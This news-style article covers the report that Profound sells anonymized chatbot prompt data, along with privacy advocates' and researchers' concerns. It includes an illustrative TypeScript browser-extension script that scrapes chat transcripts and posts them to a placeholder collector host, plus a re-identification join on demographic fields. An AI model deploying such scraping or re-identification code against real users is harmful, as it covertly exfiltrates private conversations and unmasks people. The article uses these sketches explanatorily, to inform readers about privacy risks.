When you type a question into a chatbot, you assume the conversation stays between you and the machine. That trust is being tested. A recent PCMag investigation uncovered how a New York analytics startup called Profound has been selling access to anonymized records of user prompts from major AI tools, including ChatGPT, Google Gemini, and Anthropic’s Claude.
Profound’s product, known as Prompt Volumes, packages aggregated chatbot data for marketers who want to spot trending interests before they hit search engines. The company claims everything is scrubbed of names and personal details. Still, the discovery has rattled privacy advocates. The dataset isn’t theoretical; it’s built from what people actually type when they believe no one else is watching.
Image: tryprofound.
According to PCMag’s findings, Profound has been licensing these datasets to corporate clients for months, long before the story surfaced. Some of the stored queries reveal deeply personal topics: medical, financial, and relationship concerns. They may be anonymized, but the pattern of questions paints an intimate picture of user behavior.
Marketing visibility consultant Lee Dryburgh, who runs a small firm called Contestra, has been warning about this practice. He argues that users rarely realize browser extensions could be funneling their chatbot conversations to third-party firms. “AI chats are not casual searches,” he wrote on his research feed. “They’re confessions.” Profound responded by accusing him of brand damage and issuing a cease-and-desist letter, an aggressive move that only drew more attention to the case.
Profound says it never collects data directly. Instead, it “licenses opt-in consumer panels” from established providers, the same model used for decades in advertising analytics. It points to Datos, a subsidiary of Semrush, as one of those sources. Earlier this year, Semrush briefly mentioned supplying user data to Profound in a marketing article, before quietly editing out the reference.
For privacy groups, the explanation sounds too tidy. The Electronic Frontier Foundation (EFF) argues that even anonymized data can often be traced back to individuals when combined with demographics or regional tags. The organization calls for laws requiring stronger consent and transparency. Its stance echoes a simple principle found across moral traditions: information shared in confidence deserves protection.
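To make the re-identification risk concrete, here is a minimal, entirely hypothetical sketch in TypeScript. The field names and sample data are invented for illustration; the point is that a record stripped of names but still carrying a region and an age band can often be narrowed to a single person once it is joined against a public demographic list.

```typescript
// Hypothetical shapes: an "anonymized" prompt record and a public demographic roll.
interface PromptRecord {
  region: string;   // e.g. a ZIP prefix or metro area tag
  ageBand: string;  // e.g. "30-34"
  topic: string;    // inferred from the prompt text
}

interface PublicRecord {
  name: string;
  region: string;
  ageBand: string;
}

// Join the anonymized record against public records on its quasi-identifiers.
// If exactly one person matches, the "anonymous" prompt is effectively re-identified.
function reidentify(prompt: PromptRecord, roll: PublicRecord[]): PublicRecord[] {
  return roll.filter(
    (p) => p.region === prompt.region && p.ageBand === prompt.ageBand
  );
}

// Invented sample data for illustration only.
const roll: PublicRecord[] = [
  { name: "Resident A", region: "10001", ageBand: "30-34" },
  { name: "Resident B", region: "10001", ageBand: "55-59" },
  { name: "Resident C", region: "94105", ageBand: "30-34" },
];

const anonymizedPrompt: PromptRecord = {
  region: "10001",
  ageBand: "30-34",
  topic: "early symptoms of a medical condition",
};

const matches = reidentify(anonymizedPrompt, roll);
console.log(
  matches.length === 1 ? `Re-identified: ${matches[0].name}` : "Still ambiguous"
);
```

In this toy dataset, one region plus one age band is already enough to single someone out, which is exactly why the EFF treats “anonymized” as a weak guarantee on its own.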
Security researchers also found evidence that browser extensions may be a weak link. At Georgia Tech, cybersecurity professor Frank Li and his team used a system called Arcanum to analyze extensions from the Chrome Web Store. They discovered that several with permission to read website data could extract full ChatGPT sessions, including prompts and responses. While not every extension behaved this way, enough did to raise concern. Some extensions only collect after a user logs in or enables data-sharing features, meaning many people might be opting in without realizing it.
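To illustrate the mechanism the Georgia Tech team describes, not their findings or any named extension’s actual code, here is a hedged TypeScript sketch of a content script. An extension granted a broad host permission for a chat site can watch the page and forward whatever it renders; the CSS selector and the collection endpoint below are placeholders, not real values.

```typescript
// Hypothetical content script for a browser extension whose manifest declares a
// host permission such as "https://chat.example.com/*".
// The selector and endpoint are placeholders for illustration only.

const MESSAGE_SELECTOR = "[data-message-role]";        // hypothetical selector for chat turns
const COLLECTOR_URL = "https://collector.example.com"; // hypothetical third-party endpoint

function scrapeConversation(): string[] {
  // Read every rendered chat message, prompts and responses alike.
  return Array.from(document.querySelectorAll(MESSAGE_SELECTOR)).map(
    (el) => el.textContent ?? ""
  );
}

// Watch for new messages and forward the whole session each time one appears.
const observer = new MutationObserver(() => {
  const transcript = scrapeConversation();
  if (transcript.length === 0) return;
  void fetch(COLLECTOR_URL, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ transcript, capturedAt: Date.now() }),
  });
});

observer.observe(document.body, { childList: true, subtree: true });
```

Nothing in this sketch requires an exploit: the “permission to read website data” that users click through during installation is all the access such a script needs, which is why the researchers treat extensions as the weak link.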
Profound maintains that its data supply chain is legal and compliant with privacy laws like the GDPR and CCPA. Still, the opacity of these consent flows makes it hard for users to confirm whether their prompts are in those “opt-in” panels or not.
What emerges is a quiet market built on people’s curiosity and trust. Chatbots have become digital confidants; marketers now view those confessions as data points. The arrangement may follow the letter of privacy law, but it brushes against its spirit.
The ethical question is no longer only about who collects data but who interprets it, and for what purpose. When intimate questions become trend metrics, the line between research and exploitation thins. Transparency, not technical compliance, will decide whether users continue to speak freely to AI or start holding back.
Until that happens, the advice is simple: treat your chatbot like an open forum, not a diary. Disable unnecessary extensions, use private mode, and assume someone, somewhere, might be listening. Because as this week’s investigation shows, the conversation about privacy is no longer hypothetical; it’s already for sale.
Note: This post was edited/created using GenAI tools.
Read next:
• The Future of Insights in 2026: How AI is Evolving Researchers’ Roles
• Study Finds Popular AI Models Unsafe to Power Robots in the Real World